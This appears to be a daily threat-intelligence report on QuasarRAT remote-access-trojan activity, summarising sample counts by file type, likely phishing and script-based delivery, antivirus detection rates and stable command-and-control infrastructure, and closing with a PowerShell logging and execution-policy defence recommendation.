Daily Summary
QuasarRAT sample submissions reached 15 today, 44% above the 7-day average of 10. This marks a notable surge after several days of steady activity, suggesting renewed operational tempo by threat actors. No new C2 servers were observed, but 15 new IOCs were logged.
New Samples Detected
The 15 new samples show a clear shift in packaging strategy. .exe files constitute 6 samples (40%), alongside 4 PowerShell scripts (.ps1), 3 batch files (.bat), and 2 MSI installers (.msi). The increased use of script-based loaders (.ps1 and .bat) relative to the week’s average indicates an evolving delivery mechanism, possibly to bypass static signature detection. Naming patterns remain generic-files are often labelled as ‘update_installer’ or ‘invoice_pdf’-with no unusual extensions observed.
Distribution Methods
Today’s distribution mix points to a multi-vector approach. The .exe and .msi samples suggest direct download links or malicious attachments in phishing emails, while the .ps1 and .bat files are likely used in staged attacks: initial access via Office macros or LNK files, then executing these scripts to retrieve the final payload. This aligns with recent campaigns where QuasarRAT is delivered through HTML smuggling or email threads.
Detection Rate
Major AV engines-including Windows Defender, CrowdStrike, and SentinelOne-detect the .exe variants well, with detection rates around 85-90% in VirusTotal checks. However, the .ps1 and .bat samples show reduced detection, averaging 60-70%, suggesting these script-based loaders are under-heuristic and may evade first-pass filters. New variants appear to incorporate simple obfuscation like base64 encoding or variable substitution to lower detection.
C2 Infrastructure
No new C2 servers were identified today. All command-and-control IPs remain from previously mapped infrastructure, with no geographic shift. The absence of new C2 domains suggests persistent use of existing servers or reliance on dynamic DNS services.
7-Day Trend
Today’s 44% spike above the 7-day average breaks a plateau of 8-11 daily submissions earlier this week. This uptick may indicate a new campaign launch or retooling by a threat group; activity is ramping up.
Security Analysis
A non-obvious observation: the heavy reliance on script-based droppers (.ps1 and .bat) rather than direct .exe delivery suggests threat actors are prioritizing evasion of email attachment filters over endpoint detection. This contrasts with late 2025 QuasarRAT campaigns, where executable payloads were more common. Actionable defense: Enable PowerShell script-block logging and constrain execution policy to explicitly block unsigned scripts in user contexts-this significantly impairs the .ps1 delivery vector without breaking legitimate workflows.